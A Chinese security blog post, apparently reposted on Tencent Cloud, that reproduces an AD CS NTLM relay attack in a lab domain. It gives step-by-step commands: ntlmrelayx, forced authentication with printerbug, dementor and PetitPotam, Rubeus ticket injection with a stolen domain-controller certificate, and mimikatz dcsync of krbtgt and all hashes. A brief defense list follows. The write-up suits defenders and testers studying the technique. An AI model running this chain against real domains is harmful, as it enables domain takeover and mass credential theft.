ADCS之中继攻击

文章前言

本篇文章我们主要介绍AD CS攻击系列中的中继攻击的基本原理和攻击手法进行简单阐述~

漏洞原理

AD CS支持几种基于HTTP协议的通过管理员可以安装的其他AD CS服务器角色功能,这些基于HTTP的证书注册接口都是易受攻击的NTLM中继攻击,一方面是因为没有启用NTLM中继保护,另一方面Authorization HTTP头明确允许通过NTLM进行身份验证,并未使用更安全的协议,例如:Kerberos

Authorization头信息:

环境搭建

基础信息
  • 攻击主机:192.168.174.129 Kali
  • 主域控机:192.168.174.2 Windows 2012 R2
  • 辅域控机:192.168.174.160 Windows 2012 R2 (AD CS服务)
  • 域内主机:192.168.174.4 Windows Server 2008
环境说明

域内存在多台主机设备,其中有一台主机上搭建了AD CS证书服务,同时安装基于HTTP协议的AD CS服务器角色功能,例如:证书注册策略Web服务等,这些Web服务采用NTLM的方式进行身份认证,此时攻击者可以通过利用打印机漏洞使得域内DC主机向攻击者主机进行强制认证,之后攻击者窃取域控主机的NTLM身份认证信息并申请证书,由于部分证书(用户/计算机)可以用于Kerberos认证,导致攻击者可以将获取到的证书导入任意域内主机,实现对目标域控的直接访问

网络拓扑
搭建流程
辅助域控

升级为域控:

加入到现有的域环境中:

DSRM密码:

选择主从域复制:

之后重启操作系统:

ADCS搭建

ADCS配置

ADCS测试

本地访问ADCS证书申请Web服务弹出以下认证框,则说明成功:

http://192.168.174.160/certsrv/

先决条件检查

之后查看DC和DC辅控是否在Domain Computers组里面,不在则需要自己加入,否则会利用失败:

漏洞利用

Step 1:域内定位CA机器

certutil -config - -ping

Step 2:安装新版本的Impacket(旧版本没有AD CS命令)

https://github.com/ExAndroidDev/impacket/tree/ntlmrelayx-adcs-attack

python3 -m pip install .

Step 3:攻击机器开启本地监听并将证书颁发机构(CA)设置为目标,即目标DC 192.168.174.2

#格式:
python3 ntlmrelayx.py -t http://<ca-server>/certsrv/certfnsh.asp -smb2support --adcs 

#示例:
python3 ntlmrelayx.py -t http://192.168.174.160/certsrv/certfnsh.asp -smb2support --adcs

Step 4:利用打印机服务漏洞强制认证

a、使用printerbug

https://github.com/dirkjanm/krbrelayx

#格式:
python printerbug.py domain/username:password@<targetName or Address> <hostname to connect to>
    
#示例:
python3 printerbug.py hacke/testuser:'test@123'@dc.hacke.testlab 192.168.174.129

成功获取到证书数据信息:

b、使用dementor.py脚本

https://github.com/NotMedic/NetNTLMtoSilverTicket

#格式:
python dementor.py -d domain -u username -p password <RESPONDERIP> <TARGET>

#示例:
python3 dementor.py -d hacke.testlab -u Al1ex -p 'Kksvqm@123' 192.168.174.129 192.168.174.2

之后获取到用户的证书信息:

c、使用Petitpotam.py脚本

https://github.com/topotam/PetitPotam

#格式:
python Petitpotam.py -d domain -u username -p password <RESPONDERIP> <TARGET>

#示例:
python3 PetitPotam.py -d hacke.testlab -u Al1ex -p 'Kksvqm@123' 192.168.174.129 192.168.174.160

之后成功得到证书信息:

Step 6:在域内主机Win08-Server上使用普通域用户登录并访问域控

Step 7:利用上面获取到的证书,获取TGT并注入

#格式:
Rubeus.exe asktgt /user:<user> /certificate:<base64-certificate> /ptt

#示例:
Rubeus.exe asktgt /user:DC$ /certificate:打印出来的base64证书数据 /ptt

Step 8:再次访问域控

查看票据信息:

Step 9:之后可以利用mimikatz,进行导出hash

KERBEROS::List 
lsadump::dcsync /user:krbtgt

或者使用以下命令:

lsadump::dcsync /all /csv

防御措施

  • 开启SSL认证
  • 开启NTML中继保护

文末小结

在实施AD CS Realy攻击时需要注意不能Relay给自身,也就是说AD CS服务和受害者主机(大多数情况下为域控)在同一主机上时,此时的受害者主机是域控主机,Realy的目标主机也是域控主机,这种情况下是不可行的,另外子域没有权限也不能Relay

参考链接

https://github.com/SecureAuthCorp/impacket/pull/1101

http://www.harmj0y.net/blog/activedirectory/certified-pre-owned/

https://www.exandroid.dev/2021/06/23/ad-cs-relay-attack-practical-guide/

本文分享自微信公众号 - 七芒星实验室(HeptagramSec),作者:Al1ex

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2021-09-01

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • ADCS系列之ESC1、ESC8复现

    https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf

    鸿鹄实验室
  • 内网基石----ADCS搭建

    AD CS证书服务(SSL证书):可以部署企业根或独立根建立SSL加密通道,这是所有服务器证书,无论品牌、申请方式都可以起到的功能,唯一的价值区别在于加密强度,...

    鸿鹄实验室
  • 攻击AD证书服务获取域控权限

    详细的介绍可以参考:https://posts.specterops.io/certified-pre-owned-d95910965cd2

    Jumbo
  • 下一代数据中心需要应用程序交付控制器(ADC)的新特性

    一项研究显示,在下一代数据中心中,更多的被需要的是应用程序交付控制器(ADC)的特性和功能。在数据中心方面仍然缺乏可扩展性和编制框架的可集成性。 下一代数据中心...

    SDNLAB
  • MOTS攻击之TCP攻击

    1. 概述 继续进行MOTS类型攻击方式的进展。这里再次强调一下,MOTS 是指 Man-On-The-Side,是一种在旁路监听模式下的攻击方式;和 MITM...

    FB客服
  • 声纹识别技术助力远程身份认证

    用户1737318
  • 黑客攻击之物理攻击教学

    大多数的母体有电池。如果您在30分钟内将其删除,BIOS的设置将重新启动(包括密码)。

    网e渗透安全部
  • Django之XSS攻击

        xss跨站脚本攻击(Cross site script,简称xss)是一种“HTML注入”,由于攻击的脚本多数时候是跨域的,所以称之为“跨域脚本”。 ...

    超蛋lhy
  • 中间人攻击

    前面的文章我们讲到了RSA算法以目前的手段是很难被攻破的,那么使用RSA算法是不是就一定安全了呢?

    程序那些事
  • APT之水坑攻击

    ‍ ‍水坑攻击‍‍‍(‍‍‍‍‍‍‍‍‍Watering hole)‍‍是‍‍‍AP‍T攻击‍中的‍手法之一‍,大‍多针对的目标是团体性质的较多。使用手法是‍‍...

    洛米唯熊
  • 中间人攻击之Bettercap工具使用

    0x03 Bettercap嗅探模块net.sniff 这个嗅探模块跟wireshark工具差不多 wireshark也可以实现

    黑白天安全
  • 安全|常见的Web攻击手段之XSS攻击

    黄小怪
  • 安全|常见的Web攻击手段之CSRF攻击

    黄小怪
  • Kali linux 渗透攻击之社会工程学攻击

    社会工程学是利用人性的弱点体察、获取有价值信息的实践方法,它是一种期盼的艺术。在缺少目标系统的必要信息时,社会工程学技术是渗透测试人员获取信息的至关重要的手段。...

    HACK学习
  • 中间人(MITM)攻击

    中间人(MITM)攻击是一个通用术语,表示当犯罪者将自己置于用户与应用程序之间的对话中时 - 窃听或模仿其中一方,使其看起来好像是正常的信息交换进展中。

    C4rpeDime
  • WPAD中间人攻击

    WPAD全称是网络代理自动发现协议(Web Proxy Autodiscovery Protocol),通过让浏览器自动发现代理服务器,定位代理配置文件,下载编...

    Al1ex
  • web安全之XSS攻击

    大象无痕
  • XSS攻击之窃取Cookie

    译者按: 10 年前的博客似乎有点老了,但是XSS 攻击的威胁依然还在,我们不得不防。

    Fundebug
  • FEERBUF--Microsoft Office之DDE攻击

    Microsoft Office可以说是使用最广泛的办公软件。然而就是因为这样,也使它成为了黑客的主要攻击目标之一,例如在网络安全对抗赛中红队会用它来窃取域哈...

    奶糖味的代言

扫码关注云+社区

领取腾讯云代金券